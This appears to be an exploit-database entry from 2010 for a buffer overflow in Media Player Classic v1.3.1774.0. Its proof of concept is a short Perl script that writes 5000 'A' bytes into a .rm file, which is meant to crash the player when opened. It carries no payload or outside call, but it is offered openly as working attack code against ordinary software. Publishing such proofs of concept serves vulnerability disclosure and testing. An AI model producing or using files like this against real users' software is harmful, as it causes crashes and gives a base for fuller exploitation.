id: 12360
date: 05/23/2010
title: Media Player Classic - v 1.3.1774.0 (.rm file) buffer Overflow poc
author: sniper ip
cves: 

==================================================================
Media Player Classic - v 1.3.1774.0 (.rm file) buffer Overflow poc
==================================================================


# Exploit Title: [ Media Player Classic - v 1.3.1774.0  (.rm file)  buffer Overflow poc ]
# Author: [ sniper ip ]
# Software Link: []
# Version: [ v 1.3.1774.0  ]
# Tested on: [ Windows  xp2 , Windows  xp3 , Windows  7 ]
# CVE : [if exists]
# Code : [
 
#!/usr/bin/perl
# |--------------------------------------------------------------------------------------------------| #
# | -- Media Player Classic - v 1.3.1774.0   (.rm file)  buffer Overflow poc --| #
# | ---------- -- By : sniper ip # My Email : sniper-ip@hotmail.com ------------- | #
# |--------------------------------------------------------------------------------------------------| #
 
$buff="A" x 5000;
open (myfile , ">>sniper.rm");
print myfile $buff;
close (myfile); 



#  0day.today [2023-03-24]  #